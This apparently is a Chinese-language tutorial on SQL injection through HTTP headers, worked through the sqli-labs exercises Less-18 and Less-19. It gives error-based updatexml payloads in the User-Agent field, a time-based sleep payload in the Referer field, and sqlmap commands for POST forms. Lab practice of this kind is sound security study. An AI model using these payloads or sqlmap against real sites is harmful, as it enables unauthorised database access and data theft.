0X01 HTTP头中的注入介绍
在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如SQL注入中,用户提交的参数都会被代码中的某些措施进行过滤。
过滤掉用户直接提交的参数,但是对于HTTP头中
提交的内容很有可能就没有进行过滤。
例如HTTP头中 User-Agent、Referer、Cookies等。dui
0X02 HTTP User-Agent注入
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
Payload内容:
updatexml(xml_document,xpath_string,new_value):
第一个参数:XML文档对象名称。
第二个参数:XPath字符串。
第三个参数:替换查找到的符合条件的数据。
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
成功执行
查看库名称
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1
构造sql语句再进行下一步操作
0X03 HTTP Referer注入
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
···
’ or (length(database())) >8 or if(1=1, sleep(5), null) or ‘1’ = '1
···
通过右下角的响应时间进行判断并继续构建SQL语句进行操作
0X04 sqlmap安全测试
Sqlmap自动搜索POST表单注入:sqlmap.py -u “http://ip/sqltest/post.php” --form
指定参数探测SQL注入:sqlmap -u http://xxx.xxx.com/Login.asp --data “n=1&p=1”
指定注入位置进行注入 ,在保存的文件中,对于参数的修改为*。
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。